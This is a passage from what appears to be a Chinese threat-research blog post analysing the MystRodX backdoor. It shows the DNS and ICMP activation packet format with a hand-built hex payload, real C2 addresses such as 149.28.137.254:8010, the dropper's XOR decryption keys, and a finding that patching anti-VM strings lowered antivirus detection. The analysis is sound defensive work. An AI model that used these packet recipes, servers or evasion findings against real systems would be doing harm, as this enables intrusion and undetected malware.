&#x652F;&#x6301;&#x3002;</p>
<h1 id="%E8%A2%AB%E5%8A%A8%E5%90%8E%E9%97%A8%E6%A8%A1%E5%BC%8F">&#x88AB;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;</h1>
<p>&#x5F53;&#x914D;&#x7F6E;&#x4E2D;<strong>Backdoor Type</strong>&#x9009;&#x9879;&#x7684;&#x503C;&#x4E3A;1&#x65F6;&#xFF0C;MystRodX&#x5F00;&#x542F;&#x88AB;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;&#xFF0C;&#x5B83;&#x4F7F;&#x7528;RAW SOCKET&#x76D1;&#x542C;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#xFF0C;<code>&#x53EF;&#x5728;&#x4E0D;&#x4F7F;&#x7528;&#x5F00;&#x653E;&#x7AEF;&#x53E3;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x88AB;&#x7279;&#x5B9A;&#x7684;DNS&#x6216;ICMP&#x7F51;&#x7EDC;&#x62A5;&#x6587;&#x6FC0;&#x6D3B;</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_rawsock.png" alt="dst_rawsock.png" loading="lazy"></p>
<p>&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x91C7;&#x7528;&#x4E86;Appendix&#x7AE0;&#x8282;&#x4E2D;&#x7684;Transform&#x7B97;&#x6CD5;&#x52A0;&#x5BC6;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x683C;&#x5F0F;&#x4E3A; <code>Magic&#xFF08;4&#x5B57;&#x8282;&#xFF09;+ Protocol&#xFF08;4&#x5B57;&#x8282;&#xFF09;+ Port&#xFF08;4&#x5B57;&#x8282;&#xFF09;+ C2</code>&#x3002;&#x5F53; Magic &#x503C;&#x6BD4;&#x5BF9;&#x901A;&#x8FC7;&#x540E;&#xFF0C;MystRodX &#x4FBF;&#x4F1A;&#x6839;&#x636E;&#x62A5;&#x6587;&#x4E2D;&#x6307;&#x5B9A;&#x7684;&#x534F;&#x8BAE;&#x7C7B;&#x578B;&#x4E0E;C2&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x63A5;&#x6536;&#x653B;&#x51FB;&#x8005;&#x7684;&#x540E;&#x7EED;&#x6307;&#x4EE4;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_connect.png" alt="dst_connect.png" loading="lazy"></p>
<p>&#x4E0D;&#x540C;&#x4E8E;&#x77E5;&#x540D;&#x7684;<strong>SYNfull Knock</strong>&#x540E;&#x95E8;&#x5B8C;&#x5168;&#x5229;&#x7528;TCP&#x534F;&#x8BAE;&#x5185;&#x90E8;&#x5B57;&#x6BB5;&#x4EE5;&#x4F20;&#x9012;&#x6307;&#x4EE4;&#xFF0C;MystRodX&#x4F7F;&#x7528;&#x7684;&#x662F;&#x4E00;&#x79CD;&#x66F4;&#x4E3A;&#x7B80;&#x5355;&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x5373;&#x6FC0;&#x6D3B;&#x6307;&#x4EE4;&#x9690;&#x85CF;&#x5728;ICMP &#x8F7D;&#x8377;&#x6216;DNS&#x8BF7;&#x6C42;&#x7684;&#x57DF;&#x540D;&#x4E2D;&#x3002;</p>
<h2 id="0x1-dns%E6%BF%80%E6%B4%BB%E6%8A%A5%E6%96%87">0x1: DNS&#x6FC0;&#x6D3B;&#x62A5;&#x6587;</h2>
<p><strong>&#x9996;&#x5148;&#x770B;&#x4E00;&#x4E0B;DNS&#x6FC0;&#x6D3B;&#x62A5;&#x6587;</strong>&#xFF0C;&#x6709;&#x6548;&#x7684;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x5FC5;&#x987B;&#x662F;<code>www.DomainName.com</code>&#x8FD9;&#x79CD;&#x683C;&#x5F0F;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnspacket_mask.png" alt="dst_dnspacket_mask.png" loading="lazy"></p>
<p>DomainName <code>{9-bytes mask}UBw98KzOQyRpoSgk5+ViISKmpC6ubi7vao=</code> &#x4F7F;&#x7528;base64&#x89E3;&#x7801;&#x540E;&#x5F97;&#x5230;&#x4EE5;&#x4E0B;&#x5BC6;&#x6587;&#xFF1A;</p>
<pre><code>00000000: C5 E4 F2 A7 11 73 DD 40  70 F7 C2 B3 39 0C 91 A6  .....s.@p...9...
00000010: 84 A0 93 9F 95 88 84 8A  9A 90 BA B9 B8 BB BD AA  ................
</code></pre>
<p>&#x4F7F;&#x7528;Transform&#x7B97;&#x6CD5;&#xFF0C;magic&#x53C2;&#x6570;&#x4E3A;0x0d&#xFF0C;magic2&#x53C2;&#x6570;&#x4E3A;&#x5BC6;&#x6587;&#x7684;&#x6700;&#x540E;&#x4E00;&#x5B57;&#x8282; 0xaa, key&#x53C2;&#x6570;&#x4E3A;key_for_backdoor&#x8FDB;&#x884C;&#x89E3;&#x5BC6;&#xFF0C;&#x5373;&#x53EF;&#x5F97;&#x5230;&#x4EE5;&#x4E0B;&#x660E;&#x6587;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnspayload.png" alt="dst_dnspayload.png" loading="lazy"></p>
<p>&#x6309;&#x7167;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x683C;&#x5F0F;&#x5BF9;&#x660E;&#x6587;&#x8FDB;&#x884C;&#x89E3;&#x6790;&#xFF0C;&#x53EF;&#x77E5;</p>
<ul>
<li>Magic&#x503C;&#x4E3A;CAT</li>
<li>&#x534F;&#x8BAE;&#x7C7B;&#x578B;&#x4E3A;TCP</li>
<li>&#x7AEF;&#x53E3;&#x4E3A;0x1f4a&#xFF0C;&#x5373;8010</li>
<li>C2&#x4E3A;149.28.137.254</li>
</ul>
<p>&#x5F53;Magic&#x901A;&#x8FC7;&#x6BD4;&#x5BF9;&#x4E4B;&#x540E;&#xFF0C;MystRodX&#x5C31;&#x4E0E;C2 <code>149.28.137.254:8010</code>&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#xFF0C;&#x7B49;&#x5F85;&#x6267;&#x884C;&#x5176;&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_dnsc2.png" alt="dst_dnsc2.png" loading="lazy"></p>
<h2 id="0x2-icmp%E6%BF%80%E6%B4%BB%E6%8A%A5%E6%96%87">0x2: ICMP&#x6FC0;&#x6D3B;&#x62A5;&#x6587;</h2>
<p><strong>&#x63A5;&#x7740;&#x770B;&#x4E00;&#x4E0B;ICMP&#x6FC0;&#x6D3B;&#x62A5;&#x6587;</strong>&#xFF0C;&#x8FD9;&#x6B21;&#x6211;&#x4EEC;&#x4ECE;&#x6B63;&#x5411;&#x7684;&#x89D2;&#x5EA6;&#xFF0C;&#x6784;&#x9020;&#x62A5;&#x6587;&#xFF0C;&#x89C2;&#x5BDF;&#x6837;&#x672C;&#x7684;&#x884C;&#x4E3A;&#x3002;</p>
<p>&#x9996;&#x5148;&#x6784;&#x9020;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;ICMP ping&#x8BF7;&#x6C42; <code>08 00 00 00 30 39 00 01</code>, &#x63A5;&#x7740;&#x6784;&#x9020;PAYLOAD&#xFF0C;&#x6307;&#x5B9A;C2&#x4E3A;192.168.96.1&#xFF0C;&#x7AEF;&#x53E3;&#x4E3A;443&#xFF0C;&#x534F;&#x8BAE;&#x4F7F;&#x7528;HTTP&#x3002;</p>
<pre><code>00000000: 43 41 54 00 01 00 00 00  BB 01 00 00 31 39 32 2E  CAT.........192.
00000010: 31 36 38 2E 39 36 2E 31  00 00 00 00 00 00 00 00  168.96.1........
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
</code></pre>
<p>&#x7136;&#x540E;&#x4F7F;&#x7528;Transform&#x7B97;&#x6CD5;&#xFF0C;magic2&#x53C2;&#x6570;&#x8BBE;&#x4E3A;0x9f&#x5BF9;Payload&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#x3002;&#x6700;&#x7EC8;&#x5C06;ICMP &#x4E0E; Payload&#x5408;&#x5E76;&#xFF0C;&#x5F62;&#x6210;&#x4EE5;&#x4E0B;&#x7684;ICMP&#x62A5;&#x6587;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_icmppacket_mask.png" alt="dst_icmppacket_mask.png" loading="lazy"></p>
<p>&#x5F53;MystRodX&#x6536;&#x5230;&#x8BE5;ICMP&#x62A5;&#x6587;&#x540E;&#xFF0C;&#x5C31;&#x4F1A;&#x4E0E;192.168.96.1:443&#x5EFA;&#x7ACB;&#x901A;&#x4FE1;&#x8FDE;&#x63A5;&#xFF0C;&#x53D1;&#x9001;HTTP&#x683C;&#x5F0F;&#x7684;&#x4E0A;&#x7EBF;&#x62A5;&#x6587;&#x3002;&#x8FD9;&#x548C;&#x6211;&#x4EEC;&#x7684;&#x9884;&#x671F;&#x5B8C;&#x5168;&#x4E00;&#x81F4;&#xFF0C;&#x9A8C;&#x8BC1;&#x4E86;&#x5206;&#x6790;&#x7684;&#x6B63;&#x786E;&#x6027;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_proof.png" alt="dst_proof.png" loading="lazy"></p>
<h1 id="%E6%B7%B1%E5%85%A5%E6%8C%96%E6%8E%98">&#x6DF1;&#x5165;&#x6316;&#x6398;</h1>
<p>&#x5728;&#x76EE;&#x524D;&#x6355;&#x83B7;&#x7684;&#x4FE9;&#x4E2A;MystRodX&#x6837;&#x672C;&#x4E2D;&#xFF0C;&#x5176;&#x914D;&#x7F6E;&#x7684;C2&#x670D;&#x52A1;&#x5668;&#x5747;&#x672A;&#x5F00;&#x653E;&#x6709;&#x6548;&#x7AEF;&#x53E3;&#x3002;&#x5B8C;&#x6210;&#x9006;&#x5411;&#x5206;&#x6790;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x9762;&#x4E34;&#x4E00;&#x4E2A;&#x5173;&#x952E;&#x95EE;&#x9898;&#xFF1A;MystRodX&#x7A76;&#x7ADF;&#x662F;&#x4E00;&#x4E2A;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#x7684;&#x5A01;&#x80C1;&#xFF0C;&#x8FD8;&#x662F;&#x5DF2;&#x88AB;&#x5F7B;&#x5E95;&#x5E9F;&#x5F03;&#xFF1F;&#x4E3A;&#x56DE;&#x7B54;&#x8FD9;&#x4E00;&#x95EE;&#x9898;&#xFF0C;&#x6211;&#x4EEC;&#x4F9D;&#x6258;&#x4E8E;<a href="https://hunter.qianxin.com/?ref=blog.xlab.qianxin.com">&#x5947;&#x5B89;&#x4FE1;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x6D4B;&#x7ED8;&#x9E70;&#x56FE;&#x5E73;&#x53F0;</a>&#x5206;&#x522B;&#x4ECE;BOT&#x7AEF;&#x548C;C2&#x7AEF;&#x8FDB;&#x884C;&#x4E86;&#x4E00;&#x4E9B;&#x5C1D;&#x8BD5;&#x3002;</p>
<h2 id="0x1-%E5%94%A4%E9%86%92bot">0x1: &#x5524;&#x9192;BOT</h2>
<p>&#x6211;&#x4EEC;&#x5C1D;&#x8BD5;&#x5728;&#x5168;&#x7F51;&#x8303;&#x56F4;&#x5185;&#x53D1;&#x9001;DNS/ICMP&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#xFF0C;&#x610F;&#x56FE;&#x5524;&#x9192;&#x5904;&#x4E8E;&#x88AB;&#x52A8;&#x6A21;&#x5F0F;&#x7684;MystRodX&#x540E;&#x95E8;&#xFF0C;&#x4ECE;&#x800C;&#x5B9A;&#x4F4D;&#x6F5C;&#x5728;&#x53D7;&#x5BB3;&#x8005;&#x3002;&#x9057;&#x61BE;&#x7684;&#x662F;&#xFF0C;&#x9664;&#x6211;&#x4EEC;&#x81EA;&#x5DF1;&#x7684;&#x6D4B;&#x8BD5;IP&#x5916;&#xFF0C;&#x5E76;&#x672A;&#x6536;&#x5230;&#x4EFB;&#x4F55;&#x6709;&#x6548;&#x4E0A;&#x7EBF;&#x54CD;&#x5E94;&#x3002;&#x9020;&#x6210;&#x8FD9;&#x4E00;&#x73B0;&#x8C61;&#x7684;&#x539F;&#x56E0;&#x53EF;&#x80FD;&#x5305;&#x62EC;&#xFF1A;&#x5728;&#x91CE;MystRodX&#x6837;&#x672C;&#x5E76;&#x672A;&#x542F;&#x7528;&#x88AB;&#x52A8;&#x540E;&#x95E8;&#x6A21;&#x5F0F;&#xFF0C;&#x6216;&#x8005;&#x6837;&#x672C;&#x4F7F;&#x7528;&#x4E86;&#x65B0;&#x7684;&#x5BC6;&#x94A5;&#x3001;Magic&#x503C;&#x7B49;&#x914D;&#x7F6E;&#xFF0C;&#x5BFC;&#x81F4;&#x6211;&#x4EEC;&#x53D1;&#x51FA;&#x7684;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x672A;&#x80FD;&#x5339;&#x914D;&#x751F;&#x6548;&#x3002;</p>
<h2 id="0x2-%E6%8E%A2%E6%B5%8Bc2">0x2: &#x63A2;&#x6D4B;C2</h2>
<p>&#x501F;&#x52A9;<strong>&#x6D3B;&#x8DC3;C2&#x63A2;&#x6D4B;&#x670D;&#x52A1;</strong>&#x7684;&#x652F;&#x6301;&#xFF0C;&#x6211;&#x4EEC;&#x6210;&#x529F;&#x53D1;&#x73B0;3&#x4E2A;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#x7684;&#x5728;&#x91CE;C2&#x670D;&#x52A1;&#x5668;&#x3002;&#x8FD9;&#x4E9B;&#x670D;&#x52A1;&#x5668;&#x5BF9;&#x4E0A;&#x7EBF;&#x62A5;&#x6587;&#x505A;&#x51FA;&#x4E86;&#x54CD;&#x5E94;&#xFF0C;&#x5411;Bot&#x56DE;&#x590D;7&#x53F7;&#x6307;&#x4EE4;&#xFF0C;&#x8981;&#x6C42;&#x5F00;&#x542F;&#x6D41;&#x91CF;&#x52A0;&#x5BC6;&#x3002;&#x5B83;&#x4EEC;&#x4ECE;2024&#x5E74;&#x6D3B;&#x8DC3;&#x81F3;&#x4ECA;&#xFF0C;&#x8BC1;&#x660E;&#x4E86;MystRodX&#x5A01;&#x80C1;&#x7684;&#x6301;&#x7EED;&#x5B58;&#x5728;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_newc2.png" alt="dst_newc2.png" loading="lazy"></p>
<p>&#x5728;MystRodX&#x7684;&#x914D;&#x7F6E;&#x9879;&#x4E2D;&#x5305;&#x542B;&#x4E00;&#x7EC4;RSA&#x516C;&#x94A5;&#xFF0C;&#x7528;&#x4E8E;&#x89E3;&#x5BC6;7&#x53F7;&#x6307;&#x4EE4;&#x3002;&#x653B;&#x51FB;&#x8005;&#x901A;&#x5E38;&#x4F1A;&#x5728;&#x4E0D;&#x540C;&#x6D3B;&#x52A8;&#x4E2D;&#x90E8;&#x7F72;&#x4E0D;&#x540C;&#x7684;&#x516C;&#x94A5;&#xFF0C;&#x76EE;&#x524D;&#x5DF2;&#x53D1;&#x73B0;&#x7684;&#x4E24;&#x4E2A;&#x516C;&#x94A5;&#x5206;&#x522B;&#x7528;&#x4E8E;&#x201C;neybquno&#x201D;&#x548C;&#x201C;zoufkcfr&#x201D;&#x6D3B;&#x52A8;&#x3002;&#x5728;7&#x53F7;&#x6307;&#x4EE4;&#x62A5;&#x6587;&#x4E2D;&#xFF0C;&#x504F;&#x79FB;0x110&#x5904;&#x957F;&#x5EA6;&#x4E3A;256&#x5B57;&#x8282;&#x7684;&#x90E8;&#x5206;&#x4E3A;MagicString&#x7684;&#x5BC6;&#x6587;&#x3002;&#x53EA;&#x6709;&#x5F53;&#x8BE5;&#x5BC6;&#x6587;&#x7ECF;&#x89E3;&#x5BC6;&#x540E;&#x5F97;&#x5230;&#x7684;MagicString&#x4E0E;&#x6837;&#x672C;&#x4E2D;&#x786C;&#x7F16;&#x7801;&#x7684;&#x5B57;&#x7B26;&#x4E32; 0x68abut &#x5B8C;&#x5168;&#x4E00;&#x81F4;&#x65F6;&#xFF0C;MystRodX&#x624D;&#x4F1A;&#x5C1D;&#x8BD5;&#x5F00;&#x542F;&#x6D41;&#x91CF;&#x52A0;&#x5BC6;&#x3002;<strong>&#x5229;&#x7528;&#x8FD9;&#x4E00;&#x7279;&#x6027;&#xFF0C;&#x53EF;&#x4EE5;&#x5224;&#x65AD;&#x67D0;&#x4E2A;C2&#x662F;&#x5426;&#x7528;&#x4E8E;&#x5DF2;&#x77E5;&#x7684;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x3002;</strong></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_magicstring.png" alt="dst_magicstring.png" loading="lazy"></p>
<p>&#x5728;&#x65B0;&#x6355;&#x83B7;&#x7684;&#x4E09;&#x4E2A;&#x6D3B;&#x8DC3;C2&#x670D;&#x52A1;&#x5668;&#x4E2D;&#xFF0C;&#x4EC5;149.28.137.254&#x4E0B;&#x53D1;&#x7684;7&#x53F7;&#x6307;&#x4EE4;&#x80FD;&#x591F;&#x88AB;&#x5DF2;&#x77E5;&#x516C;&#x94A5;&#x6210;&#x529F;&#x89E3;&#x5BC6;&#x3002;&#x8FD9;&#x4E00;&#x73B0;&#x8C61;&#x8868;&#x660E;&#xFF0C;&#x53E6;&#x5916;&#x4E24;&#x4E2A;C2&#xFF08;156.244.6.68&#x4E0E;185.22.153.228&#xFF09;&#x5E94;&#x5F52;&#x5C5E;&#x4E8E;&#x67D0;&#x6B21;&#x5C1A;&#x672A;&#x77E5;&#x6653;&#x7684;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#xFF0C;<strong>&#x610F;&#x5473;&#x7740;&#x5F53;&#x524D;&#x5728;&#x91CE;&#x73AF;&#x5883;&#x4E2D;&#x80AF;&#x5B9A;&#x5B58;&#x5728;&#x5C1A;&#x672A;&#x88AB;&#x6355;&#x83B7;&#x7684;MystRodX&#x6837;&#x672C;</strong>&#x3002;</p>
<h1 id="%E6%A3%80%E6%B5%8B%E5%88%86%E6%9E%90">&#x68C0;&#x6D4B;&#x5206;&#x6790;</h1>
<p>&#x5728;&#x4FE9;&#x4E2A;&#x6708;&#x5185;MystRodX&#x7684;&#x6837;&#x672C;&#x68C0;&#x6D4B;&#x7387;&#x7A0D;&#x6709;&#x63D0;&#x9AD8;&#xFF0C;&#x76EE;&#x524D;&#x5DF2;&#x5347;&#x81F3;6/65&#xFF0C;&#x4E3B;&#x6D41;&#x6807;&#x7B7E;&#x4F9D;&#x7136;&#x662F;Mirai&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_vt.png" alt="dst_vt.png" loading="lazy"></p>
<p>&#x6211;&#x4EEC;&#x63A8;&#x6D4B;&#x90E8;&#x5206;&#x6740;&#x8F6F;&#x4F7F;&#x7528;Mirai&#x8FD9;&#x4E2A;&#x6807;&#x7B7E;&#xFF0C;&#x662F;&#x56E0;&#x4E3A;&#x6837;&#x672C;&#x4F7F;&#x7528;&#x4E86;Mirai&#x7ECF;&#x5178;&#x7684;&#x5355;&#x5B57;&#x8282;Xor&#x7684;&#x65B9;&#x5F0F;&#x52A0;&#x5BC6;&#x4E0E;&#x865A;&#x62DF;&#x673A;&#xFF0C;&#x8C03;&#x8BD5;&#x5668;&#x76F8;&#x5173;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x3002;</p>
<table>
<thead>
<tr>
<th>vmware</th>
<th>vbox</th>
<th>phoenix</th>
</tr>
</thead>
<tbody>
<tr>
<td>innotek</td>
<td>lldb</td>
<td>strace</td>
</tr>
</tbody>
</table>
<p>&#x5C1D;&#x8BD5;&#x4FE9;&#x79CD;patch&#x65B9;&#x5F0F;&#xFF1A;&#x4E00;&#x79CD;&#x662F;&#x79FB;&#x9664;&#x6837;&#x672C;&#x4E2D;&#x865A;&#x62DF;&#x673A;&#xFF0C;&#x8C03;&#x8BD5;&#x5668;&#x76F8;&#x5173;&#x7684;&#x52A0;&#x5BC6;&#x5B57;&#x4E32;&#xFF1B;&#x53E6;&#x4E00;&#x79CD;&#x662F;&#x4F7F;&#x7528;&#x660E;&#x6587;&#x66FF;&#x6362;&#x5BF9;&#x5E94;&#x7684;&#x5BC6;&#x6587;&#x3002;&#x6740;&#x8F6F;&#x5BF9;Patch&#x4E4B;&#x540E;&#x6587;&#x4EF6;&#x7684;&#x68C0;&#x6D4B;&#x8BA9;&#x4EBA;&#x8BE7;&#x5F02;&#xFF0C;&#x7ED3;&#x679C;&#x8868;&#x660E;&#x8FD9;&#x4FE9;&#x79CD;patch&#x65B9;&#x5F0F;&#x90FD;&#x6709;&#x6548;&#x7684;&#x964D;&#x4F4E;&#x4E86;&#x68C0;&#x6D4B;&#x7387;&#x3002;<strong>&#x7136;&#x800C;&#x8FD9;&#x4E9B;&#x5B57;&#x4E32;&#x5B9E;&#x9645;&#x4E0A;&#x548C;&#x6837;&#x672C;&#x7684;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x5B8C;&#x5168;&#x65E0;&#x5173;&#xFF0C;&#x8FD9;&#x8BF4;&#x660E;&#x793E;&#x533A;&#x5E76;&#x672A;&#x771F;&#x6B63;&#x7684;&#x8BC6;&#x522B;MystRodX&#x8FD9;&#x4E00;&#x5A01;&#x80C1;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_patch.png" alt="dst_patch.png" loading="lazy"></p>
<h1 id="dropper%E5%88%86%E6%9E%90">Dropper&#x5206;&#x6790;</h1>
<h2 id="0x1-%E5%AD%97%E4%B8%B2%E8%A7%A3%E5%AF%86">0x1: &#x5B57;&#x4E32;&#x89E3;&#x5BC6;</h2>
<p>MystRodX&#x4F7F;&#x7528;&#x5355;&#x5B57;&#x8282;Xor&#x5BF9;&#x654F;&#x611F;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#x4FDD;&#x62A4;&#xFF0C;&#x89E3;&#x5BC6;&#x65B9;&#x6CD5;&#x5F88;&#x7B80;&#x5355;&#xFF1A;&#x5BC6;&#x6587;&#x6700;&#x540E;&#x4E00;&#x5B57;&#x8282;&#x4E3A;xor&#x5BC6;&#x94A5;&#xFF0C;&#x5C06;&#x5176;&#x4E0E;&#x5BC6;&#x6587;&#x9010;&#x5B57;&#x8282;&#x8FDB;&#x884C;xor&#x5373;&#x53EF;&#x3002;&#x5982;&#x5BC6;&#x6587;<code>\x13\x08\x12\x04\x17\x00\x65</code>&#xFF0C;&#x5B83;&#x7684;&#x5BC6;&#x94A5;&#x4E3A;0x65&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x4E3A;<code>vmware\x00</code>&#x3002;&#x4E3A;&#x4E86;&#x5206;&#x6790;&#x7684;&#x65B9;&#x4FBF;&#xFF0C;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;Idapython&#x811A;&#x672C;&#x5B9E;&#x73B0;&#x6279;&#x91CF;&#x89E3;&#x5BC6;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_decodestring.png" alt="dst_decodestring.png" loading="lazy"></p>
<p>&#x6548;&#x679C;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_strings.png" alt="dst_strings.png" loading="lazy"></p>
<p>&#x89E3;&#x5BC6;&#x51FA;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x53EF;&#x4EE5;&#x5206;&#x6210;3&#x5927;&#x7C7B;&#xFF0C;&#x5206;&#x522B;&#x7528;&#x4E8E;&#x865A;&#x62DF;&#x673A;&#x68C0;&#x6D4B;&#xFF0C;&#x8C03;&#x8BD5;&#x68C0;&#x6D4B;&#xFF0C;&#x542F;&#x52A8;Launcher&#x7B49;&#x529F;&#x80FD;&#x3002;</p>
<ol>
<li>VM&#x76F8;&#x5173;&#xFF1A;&#x68C0;&#x67E5;/sys/class/dmi/id/bios_vendor&#x7684;&#x5185;&#x5BB9;&#x662F;&#x5426;&#x5305;&#x542B;<code>vmware&#xFF0C;vbox&#xFF0C;Phoneix&#xFF0C;innotek</code>&#x6765;&#x5224;&#x65AD;&#x5F53;&#x524D;&#x662F;&#x5426;&#x5904;&#x4E8E;&#x865A;&#x62DF;&#x5316;&#x73AF;&#x5883;</li>
<li>Debugger&#x76F8;&#x5173;&#xFF1A;&#x68C0;&#x67E5;&#x7236;&#x8FDB;&#x7A0B;&#x540D;&#x662F;&#x5426;&#x5339;&#x914D;&#x5E38;&#x89C1;&#x8C03;&#x8BD5;&#x5DE5;&#x5177;<code>gdb&#xFF0C;lldb&#xFF0C;ltrace&#xFF0C;strace</code>&#x5224;&#x65AD;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x662F;&#x5426;&#x88AB;&#x8C03;&#x8BD5;</li>
<li>Launcher&#x76F8;&#x5173;&#xFF1A;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;Launcher&#x6587;&#x4EF6;&#x540D;&#xFF0C;pid&#x6587;&#x4EF6;&#xFF0C;&#x4EE5;&#x53CA;&#x5DE5;&#x4F5C;&#x76EE;&#x5F55;</li>
</ol>
<h2 id="0x2-payload%E8%A7%A3%E5%AF%86">0x2: Payload&#x89E3;&#x5BC6;</h2>
<p>&#x89E3;&#x5BC6;Payload&#x524D;&#x9700;&#x8981;&#x9884;&#x5148;&#x8BBE;&#x7F6E;&#x4E00;&#x4E2A;keyinfo&#x7684;&#x7ED3;&#x6784;&#x4F53;&#xFF0C;&#x5176;&#x4E2D;key1&#x7684;&#x503C;&#x4E3A;0x13&#xFF0C;xorkey&#x7531;&#x6837;&#x672C;&#x786C;&#x7F16;&#x7801;&#xFF0C;&#x957F;&#x5EA6;&#x4E3A;32&#x5B57;&#x8282;&#x3002;</p>
<pre><code>struct keyinfo
{
  uint8_t key1;
  uint8_t unknow[3];
  void *xorkey;
  uint16_t xorkey_len;
  uint8_t key2;
  uint8_t notused;
};

xorkey 
00000000  02 06 03 09 04 02 0e 0a 01 0f 08 0a 04 0d 0b 09  |................|
00000010  0a 09 01 03 06 05 6d 0c 01 02 0f 03 03 0a 05 00  |......m.........|

</code></pre>
<p>&#x800C;key2&#x5219;&#x662F;&#x5BF9;xorkey&#x4F7F;&#x7528;&#x7C7B;&#x4F3C;&#x6821;&#x9A8C;&#x548C;&#x7684;&#x7B97;&#x6CD5;&#x8BA1;&#x7B97;&#x800C;&#x6765;&#xFF0C;&#x6B64;&#x5904;&#x5B83;&#x7684;&#x503C;&#x4E3A;0x90&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_checksum.png" alt="dst_checksum.png" loading="lazy"></p>
<p>&#x83B7;&#x5F97;key1&#xFF0C;xorkey&#xFF0C;key2 &#x4E4B;&#x540E;&#x4F7F;&#x7528;&#x4EE5;&#x4E0B;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#x89E3;&#x5BC6;Payload&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;Payload&#x7684;&#x6700;&#x540E;&#x4E00;&#x4E2A;&#x5B57;&#x8282;&#x4E5F;&#x662F;&#x4E00;&#x4E2A;&#x5BC6;&#x94A5;&#x3002;&#x8FD9;&#x4E2A;&#x7B97;&#x6CD5;&#x5728;MystRodX&#x7684;&#x591A;&#x4E2A;&#x573A;&#x666F;&#x4E2D;&#x91CD;&#x590D;&#x4F7F;&#x7528;&#xFF0C;&#x5982;AES&#x5BC6;&#x94A5;&#x7684;&#x89E3;&#x5BC6;&#xFF0C;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x7684;&#x89E3;&#x5BC6;&#x7B49;&#xFF0C;&#x6211;&#x4EEC;&#x79F0;&#x4E4B;&#x4E3A;MystRodX_Transform&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_payload.png" alt="dst_payload.png" loading="lazy"></p>
<p>&#x7ECF;&#x8FC7;&#x5206;&#x6790;&#x540E;&#xFF0C;&#x6211;&#x4EEC;&#x4F7F;&#x7528;Python&#x5B9E;&#x73B0;&#x4E86;&#x5BF9;&#x8BE5;&#x7B97;&#x6CD5;&#x7684;&#x6A21;&#x62DF;&#xFF0C;<strong>&#x8BE6;&#x60C5;&#x89C1;Appendix&#x7AE0;&#x8282;&#x7684;Transform Algorithm&#x90E8;&#x5206;</strong>&#x3002;&#x5B9E;&#x9645;&#x4F7F;&#x7528;&#x53EA;&#x9700;&#x63D0;&#x4F9B;magic,magic2,&#x4EE5;&#x53CA;key&#x5373;&#x53EF;&#x3002;&#x4F8B;&#x5982;&#x89E3;&#x5BC6;Payload&#xFF0C;magic&#x4E3A;&#x4E0A;&#x6587;&#x6240;&#x8BF4;&#x7684;key1 0x13&#xFF0C;magic2&#x4E3A;Payload&#x7684;&#x6700;&#x540E;&#x4E00;&#x5B57;&#x8282; 0xab&#xFF0C;key&#x4F7F;&#x7528;key_for_dropper&#x3002;</p>
